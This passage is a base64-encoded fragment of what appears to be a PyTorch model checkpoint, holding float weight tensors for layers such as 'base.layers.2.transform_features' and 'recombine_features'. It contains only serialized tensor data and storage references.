8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU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